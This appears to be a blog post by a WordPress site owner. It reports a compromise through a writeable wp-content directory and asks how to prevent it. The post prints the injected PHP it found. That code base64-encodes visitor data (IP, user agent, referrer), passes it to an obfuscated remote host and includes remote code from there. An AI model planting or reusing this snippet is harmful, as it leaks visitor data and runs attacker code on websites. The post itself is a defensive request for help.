hacked by user7.phpinclude.ru

A few days ago WordPress suddenly stopped sending e-mails when a comment was posted. I changed the e-mail address but it did not help. Today when editing a new item I got an error message that with the address http://user7.phpinclude.ru in it. After some searching I found that someone managed to inject the following code in the file wp-cach-config.php in the wp-content directory:

error_reporting(0);
$a=(isset($_SERVER[”HTTP_HOST”]) ? $_SERVER[”HTTP_HOST”] : $HTTP_HOST);
$b=(isset($_SERVER[”SERVER_NAME”]) ? $_SERVER[”SERVER_NAME”] : $SERVER_NAME);
$c=(isset($_SERVER[”REQUEST_URI”]) ? $_SERVER[”REQUEST_URI”] : $REQUEST_URI);
$g=(isset($_SERVER[”HTTP_USER_AGENT”]) ? $_SERVER[”HTTP_USER_AGENT”] : $HTTP_USER_AGENT);
$h=(isset($_SERVER[”REMOTE_ADDR”]) ? $_SERVER[”REMOTE_ADDR”] : $REMOTE_ADDR);
$n=(isset($_SERVER[”HTTP_REFERER”]) ? $_SERVER[”HTTP_REFERER”] : $HTTP_REFERER);
$str=base64_encode($a).”.”.base64_encode($b).”.”.base64_encode($c).”.”.base64_encode($g).”.”.base64_encode($h).”.”.base64_encode($n);
if((include_once(base64_decode(”aHR0cDovLw==”).base64_decode(”dXNlcjcucGhwaW5jbHVkZS5ydQ==”).”/?”.$str))) { } else
{ include_once(base64_decode(”aHR0cDovLw==”).base64_decode(”dXNlcjcucGhwaW5jbHVkZS5ydQ==”).”/?”.$str); }

Because wp-cache needs a writeable wp-content directory, someone was able to put this in. It sends stuff to phpinclude.ru. Probably to catch e-mail adresses for spam.

Does anyone know how to prevent this or how to use wp-cache without a writeable wp-content directory?